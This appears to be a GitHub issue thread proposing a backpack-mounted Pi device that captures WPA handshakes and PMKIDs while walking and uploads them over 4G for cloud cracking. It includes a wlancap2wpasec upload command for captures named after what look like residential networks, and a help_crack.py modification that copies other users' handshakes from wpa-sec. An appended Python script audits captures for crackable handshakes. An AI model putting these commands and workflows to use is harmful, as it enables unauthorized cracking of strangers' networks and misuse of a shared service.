eliddell1 / FistBump

ProtoType for a handheld device used to grab WPA four way handshakes
MIT License

Wifite 2? #2

Open ProjectZeroDays opened 4 years ago

ProjectZeroDays commented 4 years ago

Is there a way we can revamp a small ARM device that uses a 4G Broadcom card and a separate internal adapter and run a light version of NetHunter on it to make this work? The Cactus 2 made a storm when they created a backpack with 22 Pineapple Nanos to scan every channel independently with 42 antennas rear-mounted in a special backpack.

https://youtu.be/3II3K44rQx4

I think you could run a light, stripped-down version of Kali for ARM devices now, using the new repository setup, with just the tools we need (tshark, pyrit, John, hashcrack, aircrack-ng suite, cowpatty, reaver, etc.) and their dependencies, using the built-in hooks, and build the exact metapackages needed to run it, and have a lightweight, low-power-consumption device that could capture PMKIDs and handshakes and use the built-in API for onlinehashcrack.com (wlancap2wpasec -u https://api.onlinehashcrack.com -e projectzerodays@gmail.com handshake_ATT2V4y9Wg_14-ED-BB-CD-22-41_2019-12-30T17-49-26.cap handshake_MySpectrumWiFi362G_58-90-43-DD-A2-3C_2019-11-26T10-17-35.cap handshake_RobertsWiFiNetwork_7C-D1-C3-CA-6C-94_2019-12-30T16-20-18.cap)

...using the Broadcom 3G/4G services to upload them to the cloud for free, where it can crack them using AWS servers with high-powered NVIDIA GPUs to run the cracks against them. The only issue would be that wifite would need to be reconfigured in Python 3 to allow hashcat to handle the dump. If hcxdumptool does not handle the process itself, it pollutes the handshake and will lead to a 99% failure rate. Now that I'm thinking of it, I can probably write this in a few days and make a distro available online for Pi users, and we can run that on a 20,000 mAh battery pack and carry it in a small backpack with four 9 dB antennas to catch 2.4 and 5 GHz, and all you would have to do is use RealVNC to remotely access the device in your backpack while walking, using a cheap Android tablet over the untouched 4G, while managing the mostly automated wifite transactions in monitor mode. If anyone is interested please let me know. The WHID Pro Elite uses a 3G/4G SIM and creates a wireless AP on air-gapped systems and more to run cracks similar to this, including remotely injecting keystrokes, bypassing air-gapped systems, conducting mousejacking attacks, doing acoustic surveillance, RF replay attacks and much more.

https://github.com/whid-injector/whid-31337


ProjectZeroDays commented 4 years ago

Someone has done something similar but no 4g. https://gist.github.com/avin/9880dbd3b1dd6f718a298740fe26c134

ProjectZeroDays commented 4 years ago

You may also want to read this thread: https://hashcat.net/forum/post-39288.html

ProjectZeroDays commented 4 years ago

1) wpa-sec moved to hashcat >= 4.0.1 and hcxtools >= 4.0.1. The Python client (help_crack.py) is updated to version 0.9.0 (10 Feb 2018). BTW: you can help retrieve new PSKs by contributing GPU power (simply run the Python client). If you add the following line to help_crack.py (line 405): os.system('cat help_crack.net >> wpasec_new.hccapx') you will get a local copy of every network hashcat is working on.

2) somebody made a video of "Automated Wifi Attacks With HCXTOOLS" https://www.youtube.com/watch?v=3-IhrlBpoQg

If we use this with the right supported WiFi/4g cards for pi, added a battery pack and antennas, you would be on the money:

So using that method, the Pi, and one of the following WiFi cards:

Right now this code supports these drivers in combination with a kernel >= 4.9:

USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter
USB ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n
PCIe RTL8821AE 802.11ac PCIe Wireless Network Adapter

And the following 4G card: S4 LTE-A (GT-I9506)

Then install hcxtools and download the python client:

help_crack.py ( )

Open it in Gedit and add the following line to help_crack.py (line 405): os.system('cat help_crack.net >> wpasec_new.hccapx'). You will get a local copy of every network hashcat is working on and prevent the files from being polluted when hcxtools handles and dumps them.

Someone made a video of "Automated Wifi Attacks With HCXTOOLS"

https://www.youtube.com/watch?v=3-IhrlBpoQg

Wifite could be modified into a new variant to support the option to let hcxtools handle the card during the needed operations and then hand it back over to wifite to run the remaining scans, as well as use hcxtools' built-in API to upload the files straight to onlinehashcrack.com using:

(wlancap2wpasec -u https://api.onlinehashcrack.com -e projectzerodays@gmail.com handshake_ATT2V4y9Wg_14-ED-BB-CD-22-41_2019-12-30T17-49-26.cap handshake_MySpectrumWiFi362G_58-90-43-DD-A2-3C_2019-11-26T10-17-35.cap handshake_RobertsWiFiNetwork_7C-D1-C3-CA-6C-94_2019-12-30T16-20-18.cap )

The mobile version of wifite can be found here and can be further modified very quickly:

https://gist.github.com/avin/9880dbd3b1dd6f718a298740fe26c134

To offload the hashing using a free service with 20 million plus password combos on GPU-driven cloud servers.
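The thread keeps returning to "polluted" handshakes: captures whose EAPOL messages do not belong to the same handshake attempt, which hashcat then cannot use. Before handing a capture to a cloud cracker it is worth checking that for each AP/client pair there is an M1/M2 pair with equal replay counters (or an M2/M3 pair with M3 = M2 + 1), and whether the AP's M1 carried a PMKID. The script below is an added example written for this page; it is not code from FistBump, wifite or hcxtools. It assumes a classic little-endian pcap with linktype 105 (raw 802.11 frames, no radiotap header) and builds its own constructed sample capture with made-up MAC addresses, nonces and PMKID so it runs offline.

```python
# Added example for this page; not code from FistBump, wifite or hcxtools. Audits a classic
# little-endian pcap with linktype 105 (raw 802.11, no radiotap; an assumption made here).
import struct
from collections import defaultdict
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"
# EAPOL-Key "Key Information" bits (IEEE 802.11-2016, 12.7.2)
KI_VERSION2, KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x2, 0x8, 0x40, 0x80, 0x100, 0x200
RSN_OUI_PMKID = b"\x00\x0f\xac\x04"   # KDE header: OUI 00-0f-ac, data type 4 = PMKID

def build_eapol_key(key_info, replay_counter, nonce, key_data=b"", mic=b"\x00" * 16):
    """EAPOL-Key frame (descriptor type 2 = RSN); IV, RSC and ID fields zeroed."""
    body = struct.pack(">BHHQ", 2, key_info, 16, replay_counter) + nonce + b"\x00" * 32
    body += mic + struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body      # 802.1X v2, type 3 = EAPOL-Key

def build_dot11_eapol(bssid, client, from_ap, eapol):
    """Plain (non-QoS) 802.11 data frame carrying EAPOL over LLC/SNAP."""
    if from_ap:   # FromDS=1: addr1 = DA (client), addr2 = BSSID, addr3 = SA
        hdr = b"\x08\x02\x00\x00" + client + bssid + bssid
    else:         # ToDS=1: addr1 = BSSID, addr2 = SA (client), addr3 = DA
        hdr = b"\x08\x01\x00\x00" + bssid + client + bssid
    return hdr + b"\x00\x00" + LLC_SNAP_EAPOL + eapol         # \x00\x00 = sequence control

def build_pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)   # linktype 105
    return out + b"".join(struct.pack("<IIII", 1577750000 + i, 0, len(f), len(f)) + f
                          for i, f in enumerate(frames))

def iter_pcap(data):
    if struct.unpack_from("<I", data, 0)[0] != 0xA1B2C3D4 or struct.unpack_from("<I", data, 20)[0] != 105:
        raise ValueError("expected little-endian pcap with raw 802.11 frames (no radiotap)")
    off = 24
    while off + 16 <= len(data):
        caplen = struct.unpack_from("<IIII", data, off)[2]
        yield data[off + 16:off + 16 + caplen]
        off += 16 + caplen

def parse_eapol_key(frame):
    """Return (bssid, client, key_info, replay_counter, nonce, key_data) or None."""
    if len(frame) < 24 or frame[0] & 0x0C != 0x08 or (frame[1] & 0x03) not in (1, 2):
        return None                                   # not a data frame, or IBSS / 4-address frame
    hlen = 26 if frame[0] & 0x80 else 24              # QoS data adds a 2-byte QoS control field
    if frame[1] & 0x02:                               # FromDS: addr1 = client, addr2 = BSSID
        bssid, client = frame[10:16], frame[4:10]
    else:                                             # ToDS: addr1 = BSSID, addr2 = client
        bssid, client = frame[4:10], frame[10:16]
    e = frame[hlen + 8:]
    if frame[hlen:hlen + 8] != LLC_SNAP_EAPOL or len(e) < 99 or e[1] != 3 or e[4] != 2:
        return None                                   # only EAPOL-Key with the RSN descriptor
    key_info, _key_len, rc = struct.unpack_from(">HHQ", e, 5)
    return bssid, client, key_info, rc, e[17:49], e[99:99 + struct.unpack_from(">H", e, 97)[0]]

def classify(key_info):
    """Four-way handshake message number from the Key Information flags (0 = not one)."""
    ack, mic = key_info & KI_ACK, key_info & KI_MIC
    if not key_info & KI_PAIRWISE or not (ack or mic):
        return 0                                      # group key handshake or malformed
    if not mic:
        return 1
    if not ack:
        return 4 if key_info & KI_SECURE else 2
    return 3 if key_info & KI_INSTALL else 0

def extract_pmkid(key_data):
    """Walk the IEs/KDEs in an M1's key data and return the PMKID if the AP sent one."""
    i = 0
    while i + 2 <= len(key_data):
        tag, ln = key_data[i], key_data[i + 1]
        if tag == 0xDD and ln >= 20 and key_data[i + 2:i + 6] == RSN_OUI_PMKID:
            return key_data[i + 6:i + 22]
        i += 2 + ln
    return None

def audit_capture(pcap_bytes):
    """Per (bssid, client): messages seen, whether a consistent M1/M2 or M2/M3 pair exists, PMKID."""
    pairs = defaultdict(lambda: {"messages": set(), "rc": defaultdict(set), "pmkid": None, "crackable": False})
    for bssid, client, key_info, rc, _nonce, key_data in filter(None, map(parse_eapol_key, iter_pcap(pcap_bytes))):
        rec, msg = pairs[(bssid.hex(":"), client.hex(":"))], classify(key_info)
        rec["messages"].add(msg)
        rec["rc"][msg].add(rc)
        if msg == 1 and rec["pmkid"] is None:
            pmkid = extract_pmkid(key_data)
            rec["pmkid"] = pmkid.hex() if pmkid else None
    for rec in pairs.values():   # hashcat needs M1+M2 with equal replay counters, or M2+M3 with M3 = M2 + 1;
        m1, m2, m3 = rec["rc"][1], rec["rc"][2], rec["rc"][3]   # anything else is a "polluted" handshake
        rec["crackable"] = bool(m1 & m2) or any(c + 1 in m3 for c in m2)
    return dict(pairs)

def sample_capture():
    """Constructed sample (made-up MACs, nonces, PMKID): clean handshake with AP1; AP2's M1/M2 are from different attempts."""
    ap1, ap2, sta = (bytes.fromhex(h) for h in ("02aabbccdd01", "02aabbccdd02", "021122334455"))
    anonce, snonce, mic, v = b"\x11" * 32, b"\x22" * 32, b"\x33" * 16, KI_VERSION2 | KI_PAIRWISE
    pmkid_kde = b"\xdd\x14" + RSN_OUI_PMKID + bytes.fromhex("0123456789abcdef0123456789abcdef")
    return build_pcap([
        build_dot11_eapol(ap1, sta, True, build_eapol_key(v | KI_ACK, 1, anonce, pmkid_kde)),
        build_dot11_eapol(ap1, sta, False, build_eapol_key(v | KI_MIC, 1, snonce, b"", mic)),
        build_dot11_eapol(ap1, sta, True, build_eapol_key(v | KI_ACK | KI_MIC | KI_INSTALL | KI_SECURE, 2, anonce, b"", mic)),
        build_dot11_eapol(ap1, sta, False, build_eapol_key(v | KI_MIC | KI_SECURE, 2, b"\x00" * 32, b"", mic)),
        build_dot11_eapol(ap2, sta, True, build_eapol_key(v | KI_ACK, 7, anonce)),     # replay counter 7
        build_dot11_eapol(ap2, sta, False, build_eapol_key(v | KI_MIC, 9, snonce, b"", mic)),  # answers rc 9
    ])
```

Running `audit_capture(sample_capture())` reports AP1 as crackable with all four messages and a PMKID, and AP2 as polluted (an M1 with replay counter 7 next to an M2 answering counter 9). Real captures from hcxdumptool are pcapng and usually carry a radiotap header (linktype 127), so strip them to linktype 105 first or extend iter_pcap; the MIC and nonces are not verified here, so treat this as a plausibility check before upload, not a replacement for the converter's own validation.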